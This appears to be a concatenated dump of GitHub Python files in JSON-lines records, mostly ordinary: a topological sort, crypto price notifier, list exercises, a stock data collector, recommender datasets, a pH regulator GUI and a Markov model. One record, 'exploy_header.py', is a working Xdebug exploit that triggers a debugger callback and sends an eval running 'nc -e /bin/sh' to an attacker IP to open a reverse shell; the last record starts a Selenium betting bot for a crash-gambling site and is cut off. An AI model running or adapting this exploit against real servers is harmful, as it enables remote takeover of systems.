},\n)","repo_name":"Kushagrabainsla/build-flask-app","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"74661849849","text":"#!/usr/bin/python3\n\nimport socket, requests, sys\nfrom base64 import b64encode\n\nif len(sys.argv) != 6:\n print(\"\\n[*] usage python3 {} {} {} {} {} {}\\n \".format(sys.argv[0],sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]))\n sys.exit(1)\n\n#start Listener \next_port =int(sys.argv[1])\next_host =sys.argv[2]\nlocal_host = sys.argv[4]\nlocal_port= int(sys.argv[3])\ncontext= sys.argv[5]\nattack_host=\"10.10.14.46\"\nattack_port=\"5656\"\nprint(\"\\n[*] Starting listener on {}:{}\".format(local_host,local_port))\n\nsk= socket.socket()\nsk.bind((local_host,local_port))\nsk.listen(10)\n\nprint(\"\\n[*] Listening....\")\nprint(\"\\n[*] Contnue process \")\ntry:\n print(\"\\n[*] Start socket with {}:{}\".format(ext_host,ext_port))\n uri=\"http://\"+ext_host+\":\"+sys.argv[1]+\"/\"+context\n print(\"\\n[*] uri request : {}\".format(uri))\n print(\"\\n[*] send request ...... \")\n r = requests.get(uri, headers={\"Cookie\":\"XDEBUG_SESSION=llllllllll\"}, timeout=2)\n print(\"----------\")\n\nexcept:\n pass\n\n#catch callback\nconn, addr =sk.accept()\nprint(\"\\n [*] accept connection \")\nclient_data = conn.recv(1024)\nprint(\"\\n[*] connection received from {}:{} on port {}\".format(addr[0],addr[1],sys.argv[3]))\nprint((conn))\nprint((client_data))\n\ncmd = 'system(\"nc -e /bin/sh {} {}\")'.format(attack_host,attack_port).encode('utf-8')\nprint(\"\\n[*] send cmd command: {}\".format(cmd))\nconn.sendall(('eval -i 1 -- %s\\x00' % b64encode(cmd).decode('utf-8')).encode('utf-8'))\nprint(\"\\n[*] exec reverse-shell from {}:{} to {}:{}\".format(attack_host,attack_port,ext_host,sys.argv[1]))\nsk.close()\nconn.close()\n","repo_name":"f0ns1/security-scripts","sub_path":"exploy_header.py","file_name":"exploy_header.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72799129849","text":"def create_graph(words):\n letters = set(''.join(words))\n graph = {letter: [] for letter in letters}\n\n for pair in zip(words, words[1:]):\n for before, after in zip(*pair):\n if before != after:\n graph[before].append(after)\n break\n\n return graph\n\nfrom collections import deque\n\ndef visit(letter, graph, visited, order):\n visited.add(letter)\n\n for next_letter in graph[letter]:\n if next_letter not in visited:\n visit(next_letter, graph, visited, order)\n\n order.appendleft(letter)\n\ndef toposort(graph):\n visited = set()\n order = deque([])\n\n for letter in graph:\n if letter not in visited:\n visit(letter, graph, visited, order)\n\n return list(order)\n\ndef alien_letter_order(words):\n graph = create_graph(words)\n return toposort(graph)\n","repo_name":"LennyGonz/LeetCode-Questions","sub_path":"Daily-Coding-Problem/problem-226.py","file_name":"problem-226.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31011018682","text":"\n# get BTC price from Binance Platform as windows notifaction\n\nimport requests\nfrom win10toast import ToastNotifier\nimport time\n\ntoaster = ToastNotifier()\n\nwhile True:\n url = 'https://api.binance.com/api/v3/ticker/price'\n parameters = {\n 'symbol': 'BTCUSDT'\n }\n\n response = requests.get(url, params=parameters)\n data = response.json()\n price = float(data['price'])\n\n toaster.show_toast(\"Bitcoin Price\", f\"${price:,.2f}\", duration=10)\n\n time.sleep(300) # wait 5 minutes\n\n\n# get multi Cryptocurrency price from Binance Platform as windows notificatin\n\nimport requests\nfrom win10toast import ToastNotifier\nimport time\nfrom binance.client import Client\n\ntoaster = ToastNotifier()\nclient = Client ('' , '')\n\nbinance_symbols = ['BTCUSDT', 'VETUSDT']\nwhile True:\n prices = client.get_all_tickers()\n for symbol in binance_symbols:\n price = float([p['price'] for p in prices if p['symbol'] == symbol][0])\n toaster.show_toast(f\"{symbol} Price\", f\"${price:,.2f}\", duration=10)\n time.sleep(300) # wait 5 minutes\n\n\n\n\n\n","repo_name":"Mehyar-Farzat/Get_Bitcoin_price","sub_path":"btc.py","file_name":"btc.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1149436393","text":"class nodo:\n def __init__(self, info):\n self.info = info\n\nclass lista_sequencial_circ:\n \n def __init__(self,tamanhoMax):\n self.lista = []\n self.indice = 0\n self.tamanho = tamanhoMax-1\n \n def inserirNoInicio(self, nodo):\n if self.indice>self.tamanho:\n print(\"Lista esta cheia!\")\n return\n if self.indice==0:\n self.lista.append(None)\n self.lista[self.indice] = nodo\n self.indice+=1\n return\n for i in range(self.indice,-1,-1):\n if i == 0:\n self.lista.append(None)\n self.lista[i]=nodo\n self.indice+=1\n return\n self.lista[i] = self.lista[i-1]\n \n \n def inserirNoFinal(self, nodo):\n if self.indice>self.tamanho:\n print(\"Lista esta cheia!\")\n return\n self.lista.append(None)\n self.lista[self.indice] = nodo\n self.indice+=1\n self.lista.append(None)\n self.lista[self.indice] = self.lista[0]\n \n\n def remover(self, info):\n if not self.lista:\n print('Lista Vazia\\nNão há o que ser removido')\n return\n i=0\n while self.lista[i].info!=info:\n i+=1\n if self.lista[i]==self.lista[0]:\n print('Conteúdo não existe!')\n return\n self.indice-=1 \n for j in range(i,self.indice):\n self.lista[j] = self.lista[j+1]\n self.lista[self.indice] = self.lista[0]\n\n def buscaPosicao(self,i , conteudo):\n if self.indice==i:\n print(\"Valor nao encontrado\")\n return\n if self.indice == 0:\n print(\"lista vazia\")\n return\n else:\n if self.lista[i].info == conteudo:\n print(\"posicao:\",i)\n return\n else:\n lista.buscaPosicao(i+1,conteudo)\n \n \n def imprimir(self): \n for i in range(self.indice):\n print(self.lista[i].info, end = ' ') \n print()\n\n def imprimirLista(a, n, ind): \n aux = ind \n \n while aux < n + ind : \n print(a[(i % n)], end = \" \") \n aux = aux + 1\n\nlista = lista_sequencial_circ(5)\nlista.inserirNoInicio(nodo(99))\nlista.inserirNoFinal(nodo(5))\nlista.inserirNoFinal(nodo(10))\nlista.inserirNoFinal(nodo(1))\nlista.inserirNoFinal(nodo(41))\nlista.inserirNoFinal(nodo(14))\nlista.imprimir()\nlista.remover(10)\nlista.imprimir()\nlista.remover(1)\nlista.imprimir()\nlista.inserirNoInicio(nodo(9))\nlista.imprimir()\nlista.buscaPosicao(0,41)","repo_name":"jonathansaless/proj-algo-1","sub_path":"prova-parte-A/prova_parte-A.py","file_name":"prova_parte-A.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16096009829","text":"import win32com.client\nimport sqlite3\n\n\nclass RealTimeCollect:\n instance = None\n\n def __init__(self):\n self.objStockCur = CpStockCur()\n conn = sqlite3.connect(\"stock_kind.db\", isolation_level=None) # sqlite 연결\n self.c = conn.cursor()\n\n def OnReceived(self):\n timess = RealTimeCollect.instance.GetHeaderValue(18) # 초\n exFlag = RealTimeCollect.instance.GetHeaderValue(19) # 예상체결 플래그\n c_price = RealTimeCollect.instance.GetHeaderValue(13) # 현재가\n diff = RealTimeCollect.instance.GetHeaderValue(2) # 대비\n cVol = RealTimeCollect.instance.GetHeaderValue(17) # 순간체결수량\n vol = RealTimeCollect.instance.GetHeaderValue(9) # 거래량\n\n if exFlag == ord('1'): # 동시호가 시간 (예상체결)\n print(\"실시간(예상체결)\", timess, \"*\", c_price, \"대비\", diff, \"체결량\", cVol, \"거래량\", vol)\n elif exFlag == ord('2'): # 장중(체결)\n print(\"실시간(장중 체결)\", timess, c_price, \"대비\", diff, \"체결량\", cVol, \"거래량\", vol)\n\n\n def Request(self, code):\n # 연결 여부 체크\n objCpCybos = win32com.client.Dispatch(\"CpUtil.CpCybos\")\n bConnect = objCpCybos.IsConnect\n if bConnect == 0:\n print(\"PLUS가 정상적으로 연결되지 않음. \")\n return False\n\n # 현재가 객체 구하기\n objStockMst = win32com.client.Dispatch(\"DsCbo1.StockMst\")\n objStockMst.SetInputValue(0, code) # 종목 코드\n objStockMst.BlockRequest()\n\n # 현재가 통신 및 통신 에러 처리\n rqStatus = objStockMst.GetDibStatus()\n rqRet = objStockMst.GetDibMsg1()\n print(\"통신상태\", rqStatus, rqRet)\n if rqStatus != 0:\n return False\n\n # 현재가 정보 조회\n code = objStockMst.GetHeaderValue(0) # 종목코드\n name = objStockMst.GetHeaderValue(1) # 종목명\n time = objStockMst.GetHeaderValue(4) # 시간\n c_price = objStockMst.GetHeaderValue(11) # 종가\n diff = objStockMst.GetHeaderValue(12) # 대비\n s_price = objStockMst.GetHeaderValue(13) # 시가\n high = objStockMst.GetHeaderValue(14) # 고가\n low = objStockMst.GetHeaderValue(15) # 저가\n offer = objStockMst.GetHeaderValue(16) # 매도호가\n bid = objStockMst.GetHeaderValue(17) # 매수호가\n vol = objStockMst.GetHeaderValue(18) # 거래량\n vol_value = objStockMst.GetHeaderValue(19) # 거래대금\n\n print(\"코드 이름 시간 현재가 대비 시가 고가 저가 매도호가 매수호가 거래량 거래대금\")\n print(code, name, time, c_price, diff, s_price, high, low, offer, bid, vol, vol_value)\n return True\n\n def start_collect_real_time_data(self):\n self.c.execute(\"SELECT CODE, NAME FROM STOCK_KIND\")\n codes = self.c.fetchall() # 종목 코드와 종목명을 tuple로 가져옴 ( fetchall은 tuple로 값을 반환 )\n\n for code in codes:\n if not self.Request(code[0]):\n return False\n self.objStockCur.Subscribe(code[0])\n self.c.close()\n\n def stop_collect_real_time_data(self):\n self.objStockCur.Unsubscribe()\n\n\nclass CpStockCur:\n def __init__(self):\n self.objStockCur = win32com.client.Dispatch(\"DsCbo1.StockCur\")\n\n def Subscribe(self, code):\n win32com.client.WithEvents(self.objStockCur, RealTimeCollect)\n self.objStockCur.SetInputValue(0, code)\n RealTimeCollect.instance = self.objStockCur\n self.objStockCur.Subscribe()\n\n def Unsubscribe(self):\n self.objStockCur.Unsubscribe()\n","repo_name":"dakso0124/stock_program","sub_path":"real_time/real_time_price.py","file_name":"real_time_price.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39056795343","text":"#simple way\na = int(input(\"Give a number: \"))\n\nif a%5 == 0:\n print(True)\nelse:\n print(False)\n\n#using function\ndef check_divisibility(b):\n if b%5 == 0:\n return True\n return False\n\n#using class\nclass Divisible_by5:\n def __init__(self,c):\n self.c = c\n\n def ans(self):\n if self.c%5 == 0:\n return True\n return False\n","repo_name":"apatil241995/Python-practice-problems-Week-7","sub_path":"28-03-2022 and 29-03-2022/python practice peoblems/21 divisible_by_5/divisible_by_5.py","file_name":"divisible_by_5.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23042211213","text":"import random\n\nclass Animal:\n\n def __init__(self):\n self.meal_need = []\n self.vegetable_need = []\n self.water_need = []\n self.cold_resistance = []\n self.heat_resistance = []\n self.aggressiveness = []\n self.predator_resistance = []\n self.age = 0\n self.score = None\n\n def init_meal(self, meal, no_meal):\n \"\"\" Methode d'initialisation du besoin en viande de l'animal \"\"\"\n\n carn = []\n\n for i in range(0, meal):\n carn.append(1)\n\n for i in range(0, no_meal):\n carn.append(0)\n\n for i in range(100 - len(carn)):\n carn.append(random.randrange(0, 2))\n\n random.shuffle(carn)\n\n self.meal_need = carn\n\n def init_vegetable(self, vegetable, novegetable):\n\n \"\"\" Methode d'initialisation du besoin en végétaux de l'animal \"\"\"\n\n veg = []\n\n for i in range(0, vegetable):\n veg.append(1)\n\n for i in range(0, novegetable):\n veg.append(0)\n\n for i in range(100 - len(veg)):\n veg.append(random.randrange(0, 2))\n\n random.shuffle(veg)\n\n self.vegetable_need = veg\n\n def init_water(self, water, nowater):\n\n \"\"\" Methode d'initialisation du besoin en eau de l'animal \"\"\"\n\n wat = []\n\n for i in range(0, water):\n wat.append(1)\n\n for i in range(0, nowater):\n wat.append(0)\n\n for i in range(100 - len(wat)):\n wat.append(random.randrange(0, 2))\n\n random.shuffle(wat)\n\n self.water_need = wat\n\n def init_cold_resistance(self, rescold, norescold):\n\n \"\"\" Methode d'initialisation de la résistance au froid de l'animal \"\"\"\n\n resistance = []\n\n for i in range(0, rescold):\n resistance.append(1)\n\n for i in range(0, norescold):\n resistance.append(0)\n\n for i in range(100 - len(resistance)):\n resistance.append(random.randrange(0, 2))\n\n random.shuffle(resistance)\n\n self.cold_resistance = resistance\n\n def init_heat_resistance(self, resheat, noresheat):\n\n \"\"\" Methode d'initialisation de la résistance à la chaleur de l'animal \"\"\"\n\n resistance = []\n\n for i in range(0, resheat):\n resistance.append(1)\n\n for i in range(0, noresheat):\n resistance.append(0)\n\n for i in range(100 - len(resistance)):\n resistance.append(random.randrange(0, 2))\n\n random.shuffle(resistance)\n\n self.heat_resistance = resistance\n\n def init_aggressiveness(self, aggressivity, no_agressivity):\n \n \"\"\" Methode d'initialisation de l'agressivité de l'animal \"\"\"\n\n aggressiveness = []\n\n for i in range(0, aggressivity):\n aggressiveness.append(1)\n\n for i in range(0, no_agressivity):\n aggressiveness.append(0)\n\n for i in range(100 - len(aggressiveness)):\n aggressiveness.append(random.randrange(0, 2))\n\n random.shuffle(aggressiveness)\n\n self.aggressiveness = aggressiveness\n \n def init_predator_resistance(self, pred_res, no_pred_res):\n \n \"\"\" Methode d'initialisation de la resistance aux prédateurs de l'animal \"\"\"\n\n resistance = []\n\n for i in range(0, pred_res):\n resistance.append(1)\n\n for i in range(0, no_pred_res):\n resistance.append(0)\n\n for i in range(100 - len(resistance)):\n resistance.append(random.randrange(0, 2))\n\n random.shuffle(resistance)\n\n self.predator_resistance = resistance\n","repo_name":"benoitRodde/AnimalSurvivor","sub_path":"server/animals/animal.py","file_name":"animal.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39020552931","text":"import numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nimport torch\nimport torch.utils.data as data\n\n\nclass Dataset(data.Dataset):\n def __init__(self, data_info, data_cfg, *args, **kwargs):\n super().__init__()\n self.data_info = data_info\n self.data_cfg = data_cfg\n\n def __getitem__(self, index):\n raise NotImplementedError\n\n def __len__(self):\n raise NotImplementedError\n\n def _get_idx_mat(self, train_data):\n value_fill_mat = np.ones(train_data.shape[0])\n shape = (self.data_info['user_ids_num'], self.data_info['photo_ids_num'])\n train_mat = sp.coo_matrix((value_fill_mat, (train_data[:, 0], train_data[:, 1])),\n shape=shape, dtype=np.float32)\n train_mat = train_mat.todok()\n return train_mat\n\n\nclass SamplingTrainSet(Dataset):\n def __init__(self, data_info, data_cfg, df):\n super().__init__(data_info, data_cfg, df)\n self.num_item = self.data_info['photo_ids_num']\n self.num_ng = self.data_cfg['num_ng']\n self.train_data = df.loc[df[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n self.train_mat = self._get_idx_mat(self.train_data)\n\n def __len__(self):\n return len(self.train_data)\n\n def __getitem__(self, idx):\n user, pos_item = self.train_data[idx]\n all_item = [pos_item]\n while len(all_item) <= self.num_ng:\n j = np.random.randint(self.num_item)\n while (user, j) in self.train_mat or j in all_item:\n j = np.random.randint(self.num_item)\n all_item.append(j)\n return torch.LongTensor([user]), torch.LongTensor(all_item)\n\n\nclass AllTrainSet(Dataset):\n def __init__(self, data_info, data_cfg, df):\n super().__init__(data_info, data_cfg, df)\n self.train_data = df.values\n\n def _get_mbr_data(self, df):\n df_all = []\n for i, action in enumerate(self.data_cfg.effective_columns):\n df_tmp = df[['user_id', 'photo_id', action]].copy()\n df_tmp[\"action\"] = i\n df_tmp = df_tmp.rename(columns={action: 'label'})\n df_all.append(df_tmp)\n df = pd.concat(df_all)\n return df\n\n def __len__(self):\n return len(self.train_data)\n\n def __getitem__(self, idx):\n entry = self.train_data[idx]\n return torch.LongTensor([entry[0]]), torch.LongTensor([entry[1]]), torch.LongTensor(\n [entry[2]]), torch.FloatTensor([entry[3]])\n\n\nclass SamplingTestSet(Dataset):\n def __init__(self, data_info, data_cfg, eval_cfg, df_train, df_test, seed=123):\n super().__init__(data_info, data_cfg, df_train)\n self.data_cfg = data_cfg\n self.eval_cfg = eval_cfg\n self.num_item = self.data_info['photo_ids_num']\n self.num_ng = self.eval_cfg.num_negative_eval\n\n if len(df_train.columns) > 2:\n train_data = df_train.loc[df_train[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n else:\n train_data = df_train.values\n self.train_mat = self._get_idx_mat(train_data)\n\n if len(df_test.columns) == 2:\n self.test_data = df_test[['user_id', 'photo_id']].values\n else:\n self.test_data = df_test.loc[df_test[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n np.random.seed(seed)\n self._ng_sample()\n\n def _ng_sample(self):\n self.users = []\n self.items = []\n for x in self.test_data:\n u, i = x[0], x[1]\n all_item = {i: 0}\n while len(all_item) <= self.num_ng:\n j = np.random.randint(self.num_item)\n while (u, j) in self.train_mat:\n j = np.random.randint(self.num_item)\n all_item[j] = 0\n all_item = list(all_item.keys())\n self.users.append([u])\n self.items.append(all_item)\n\n def __len__(self):\n return len(self.test_data)\n\n def __getitem__(self, idx):\n user = self.users[idx]\n item = self.items[idx]\n return torch.LongTensor(user), torch.LongTensor(item)\n\n\nclass AllTestSet(Dataset):\n def __init__(self, data_info, data_cfg, eval_cfg, df_train, df_test, seed=123):\n super().__init__(data_info, data_cfg, df_train)\n if len(df_train.columns) > 2:\n train_data = df_train.loc[df_train[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n else:\n train_data = df_train.values\n test_data = df_test.values\n\n self.train_mask = self._get_idx_mat(train_data).tocsr()\n self.ground_truth = self._get_idx_mat(test_data).tocsr()\n\n def __getitem__(self, index):\n return index, torch.from_numpy(self.ground_truth[index].toarray()).squeeze(), torch.from_numpy(\n self.train_mask[index].toarray()).float().squeeze()\n\n def __len__(self):\n return self.data_info['user_ids_num']\n\n\n__all__ = [s for s in dir() if \"trainset\" in s.lower() or \"testset\" in s.lower()]\n","repo_name":"MHMR-recsys/MHMR","sub_path":"utility/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34268164828","text":"#GardenManager.py\nfrom AnalogProbe import *\nfrom Pump import *\nfrom MCP3008 import MCP3008\nfrom tkinter import *\nimport time\nimport threading\n\n \nupperLimit = 10.50 #Starting pH for upper limit\nlowerLimit = 8.50 #Starting pH for lower limit\n\ndef addToUpperLimit():\n global upperLimit\n if(upperLimit < 13.9):\n upperLimit = upperLimit + 0.1\n upperLimitDisplay = Label (win, text=\"{:.1f}\".format(upperLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2') #creates abels for upper limits\n upperLimitDisplay.place(x=520,y=125)\n #print(\"Upper Limit is now\",upperLimit)\n else:\n pass\ndef subFromUpperLimit():\n global upperLimit\n if(upperLimit > lowerLimit + 0.6):\n upperLimit = upperLimit - 0.1\n upperLimitDisplay = Label (win, text=\"{:.1f}\".format(upperLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2')\n upperLimitDisplay.place(x=520,y=125)\n #print(\"Upper Limit is now\",upperLimit)\n else:\n pass\ndef addToLowerLimit():\n global lowerLimit\n if(lowerLimit < upperLimit - 0.6):\n lowerLimit = lowerLimit + 0.1\n lowerLimitDisplay = Label (win, text=\"{:.1f}\".format(lowerLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2')\n lowerLimitDisplay.place(x=520,y=275)\n #print(\"Lower Limit is now\",lowerLimit)\n else:\n pass\ndef subFromLowerLimit():\n global lowerLimit\n if(lowerLimit > 0.1):\n lowerLimit = lowerLimit - 0.1\n lowerLimitDisplay = Label (win, text=\"{:.1f}\".format(lowerLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2')\n lowerLimitDisplay.place(x=520,y=275)\n #print(\"Lower Limit is now\",lowerLimit)\n else:\n pass\n \n# Dispenses 5ml of base solution\ndef dispenseBase():\n # Creates object p1 of class Pump\n p1 = Pump('/dev/ttyAMA1')\n # D is for dispense, number is for volume in ml\n p1.send_cmd(\"D,2\")\n \n# Dispenses 5ml of acid solution\ndef dispenseAcid():\n # Creates object p2 of class Pump\n p2 = Pump('/dev/ttyAMA0')\n # D is for dispense, number is for volume in ml\n p2.send_cmd(\"D,2\")\n \n\n#TODO: add conditionals so that lower limit will never exceed upper limit\n#Upper limit must not exceed 14, lower limit must not go below 0.\n \nwin = Tk()\nf = Frame(win)\n\n# Title\nwin.title(\"pH Dashboard\")\nwin.minsize(width=800,height=480) #matched to Elemnent14 7\" touchscreen display screen resolution\nwin.configure(bg='NavajoWhite3')\n\n\n# Displays current ph on a label and updates every 2 seconds\ndef displaypH():\n while True:\n # gets current pH and stores in variable currentph\n currentph = \"{:.2f}\".format(AnalogProbe.getpH())\n currentphlabel = Label (win, text=currentph,font=(\"Arial Bold\",60),bg='NavajoWhite2')\n currentphlabel.place(x=240,y=170)\n time.sleep(2)\n# Tests if pH is within range and dispenses Acid or Base accordingly\ndef regulatepH():\n while True:\n if(AnalogProbe.getpH() > upperLimit):\n print(\"too basic. dispensing acid\")\n dispenseAcid()\n time.sleep(5)\n if(AnalogProbe.getpH() < lowerLimit):\n print(\"too acidic. dispensing base\")\n dispenseBase()\n time.sleep(5)\n else:\n print(\"ph is within range. testing again in 5 seconds\")\n time.sleep(5)\n \n# Displays upper and lower limit before any changes are made via buttons\nupperLimitDisplay = Label (win, text=upperLimit, font=(\"Arial Bold\",40),bg='NavajoWhite2') #creates labels for upper limits\nupperLimitDisplay.place(x=520,y=125)\nlowerLimitDisplay = Label (win, text=lowerLimit, font=(\"Arial Bold\",40),bg='NavajoWhite2')\nlowerLimitDisplay.place(x=520,y=275)\n \n# Displays Up and Down buttons to control the upper and lower thresholds\nbutton1 = Button(win, text=' Up ', command = addToUpperLimit,bg='NavajoWhite2' )\nbutton1.place(x=650,y=120)\nbutton2 = Button(win, text='Down', command = subFromUpperLimit,bg='NavajoWhite2')\nbutton2.place(x=650,y=160)\nbutton3 = Button(win, text=' Up ', command = addToLowerLimit,bg='NavajoWhite2')\nbutton3.place(x=650,y=270)\nbutton4 = Button(win, text='Down', command = subFromLowerLimit,bg='NavajoWhite2')\nbutton4.place(x=650,y=310)\n\n# Dispense Acid Button\nbutton5 = Button(win, text='Dispense Acid', command = dispenseAcid,bg='NavajoWhite2', font=(\"Arial Bold\",20))\nbutton5.place(x=80,y=370)\n\n# Dispense Base Button\nbutton6 = Button(win, text='Dispense Base', command = dispenseBase,bg='NavajoWhite2', font=(\"Arial Bold\",20))\nbutton6.place(x=330,y=370)\n \n# Creates label \"The current pH is:\"\nlbl = Label (win, text=\"pH: \", font=(\"Arial Bold\",60),bg='NavajoWhite2')\nlbl.place(x=80,y=170)\n\nheader = Label(win, text = \" Auto pH Regulator \",font=(\"Arial Bold\",50),bg='NavajoWhite2' )\nheader.place(x=70,y=30)\n \nx = threading.Thread(target = displaypH) #starts a new thread displaypH so that the program doesnt freeze\nx.start() \n\ny = threading.Thread(target = regulatepH)\ny.start()\n\nwin.mainloop()\n\n \n \n ","repo_name":"shotaseanyasuda/Hydroponic-Garden-Manager-RaspberryPi4","sub_path":"Hydroponic Project/GardenManager.py","file_name":"GardenManager.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73785423289","text":"import numpy as _np\nimport collections as _co\nimport bisect as _bs\nimport itertools as _iter\n\nimport scipy.sparse as _sparse\nimport scipy.misc as _misc\nimport scipy.sparse.linalg as _sla\nimport scipy.linalg as _la\n\nfrom scipy.stats import chi2\n\nfrom pathpy.Log import Log\nfrom pathpy.Log import Severity\n\n_np.seterr(all='warn')\n\n\nclass MarkovSequence:\n \"\"\" Instances of this class can be used to fit\n standard higher-order Markov models for\n sequences generated from concatenated paths \"\"\"\n\n def __init__(self, sequence):\n \"\"\"\n Generates a Markov model for a sequence, given\n as a single list of strings\n \"\"\"\n\n ## The sequence to be modeled\n self.sequence = sequence\n\n ## The transition probabilities of higher-order Markov chains\n self.P = {}\n\n ## the set of states of higher-order Markov chains\n self.states = {}\n self.states[1] = set(sequence)\n\n\n def fitMarkovModel(self, k=1):\n \"\"\" Generates a k-th order Markov model\n for the underlying sequence\n \"\"\"\n\n # TODO: Add support for k=0\n\n assert len(self.sequence)>0, \"Error: Empty sequence\"\n\n # MLE fit of transition probabilities\n self.P[k] = _co.defaultdict( lambda: _co.defaultdict( lambda: 0.0 ) )\n\n Log.add('Fitting Markov model with order k = ' + str(k))\n\n # Generate initial memory prefix\n mem = (())\n for s in self.sequence[:k]:\n mem += (s,)\n\n # count state transitions\n for s in self.sequence[k:]:\n self.P[k][mem][s] += 1.0\n\n # shift memory by one element\n mem = mem[1:] + (s,)\n\n # normalize transitions\n for m in self.P[k]:\n S = float(sum(self.P[k][m].values()))\n for s in self.P[k][m]:\n self.P[k][m][s] /= S\n Log.add('finished.')\n\n\n def getLikelihood(self, k=1, log=True):\n \"\"\"\n Returns the likelihood of the sequence\n assuming a k-th order Markov model\n \"\"\"\n\n if k not in self.P:\n self.fitMarkovModel(k)\n\n L = 0\n\n # Generate initial prefix\n mem = (())\n for s in self.sequence[:k]:\n mem += (s,)\n\n for s in self.sequence[k:]:\n L += _np.log(self.P[k][mem][s])\n\n # shift memory by one element\n mem = mem[1:] + (s,)\n\n if log:\n return L\n else:\n return _np.exp(L)\n\n\n def getBIC(self, k=1, m=1):\n \"\"\" Returns the Bayesian Information Criterion\n assuming a k-th order Markov model \"\"\"\n\n if k not in self.P:\n self.fitMarkovModel(k)\n\n if m not in self.P:\n self.fitMarkovModel(m)\n\n L_k = self.getLikelihood(k, log=True)\n L_m = self.getLikelihood(m, log=True)\n\n s = len(self.states[1])\n n = len(self.sequence)-k\n\n # the transition matrix of a first-order model with s states has s**2 entries, subject to the\n # constraint that entries in each row must sum up to one (thus effectively reducing\n # the degrees of freedom by a factor of s, i.e. we have s**2-s**1. Generalizing this to order k,\n # we arrive at s**k * (s-1) = s**(k+1) - s**k derees of freedom\n bic = _np.log(n) * (s**k - s**m) * (s-1) - 2.0 * (L_k-L_m)\n\n return bic\n\n\n def getAIC(self, k=1, m=1):\n \"\"\" Returns the Aikake Information Criterion\n assuming a k-th order Markov model \"\"\"\n\n if k not in self.P:\n self.fitMarkovModel(k)\n\n if m not in self.P:\n self.fitMarkovModel(m)\n\n L_k = self.getLikelihood(k, log=True)\n L_m = self.getLikelihood(m, log=True)\n\n s = len(self.states[1])\n n = len(self.sequence)\n\n aic = 2 * (s**k - s**m) * (s-1) - 2.0 * (L_k - L_m)\n\n return aic\n\n\n def estimateOrder(self, maxOrder, method='BIC'):\n \"\"\" Estimates the optimal order of a Markov model\n based on Likelihood, BIC or AIC \"\"\"\n\n assert method == 'BIC' or method == 'AIC' or method == 'Likelihood', \"Error: Expecting method 'AIC', 'BIC' or 'Likelihood'\"\n\n values = []\n orders = []\n\n # We need k < m for the BIC and AIC calculation, which\n # is why we only test up to maxOrder - 1\n for k in range(1, maxOrder):\n if k not in self.P:\n self.fitMarkovModel(k)\n\n orders.append(k)\n\n if method == 'AIC':\n values.append(self.getAIC(k, maxOrder))\n elif method == 'BIC':\n values.append(self.getBIC(k, maxOrder))\n elif method == 'Likelihood':\n values.append(self.getLikelihood(k, log=True))\n\n if method == 'Likelihood':\n values.append(self.getLikelihood(maxOrder, log=True))\n orders.append(maxOrder)\n\n # return order at which likelihood is maximized\n return orders[_np.argmax(values)]\n else:\n # return order at which BIC/AIC are minimized\n return orders[_np.argmin(values)]\n","repo_name":"IngoScholtes/pathpy","sub_path":"pathpy/MarkovSequence.py","file_name":"MarkovSequence.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"77"} +{"seq_id":"1137393220","text":"from selenium import webdriver\r\nimport re\r\nimport time\r\nimport random\r\n\r\ndatafile = open(\"testData.txt\", \"a\")\r\n\r\nclass StreakBot():\r\n locationValue = []\r\n locationValue2 = []\r\n history = []\r\n automatedButton = None\r\n manualButton = None\r\n manualBetAmount = None\r\n startAutoBet = None\r\n manualAutoCashOut = None\r\n autoBetAmount = None\r\n cash = None\r\n def __init__(self):\r\n self.driver = webdriver.Chrome()\r\n self.locationValue = []\r\n self.locationValue2 = []\r\n self.history = []\r\n self.automatedButton = None\r\n self.manualButton = None\r\n self.startAutoBet = None\r\n self.manualBetAmount = None\r\n self.manualAutoCashOut = None\r\n self.startManualBet = None\r\n self.autoBetAmount = None\r\n self.cash = None\r\n\r\n def login(self):\r\n self.driver.get('https://roobet.com/crash')\r\n time.sleep(3)\r\n self.locationValue = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[2]/div[2]/div[1]')\r\n self.locationValue2 = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[2]/div[2]/div[2]')\r\n self.automatedButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[2]')\r\n self.manualButton = 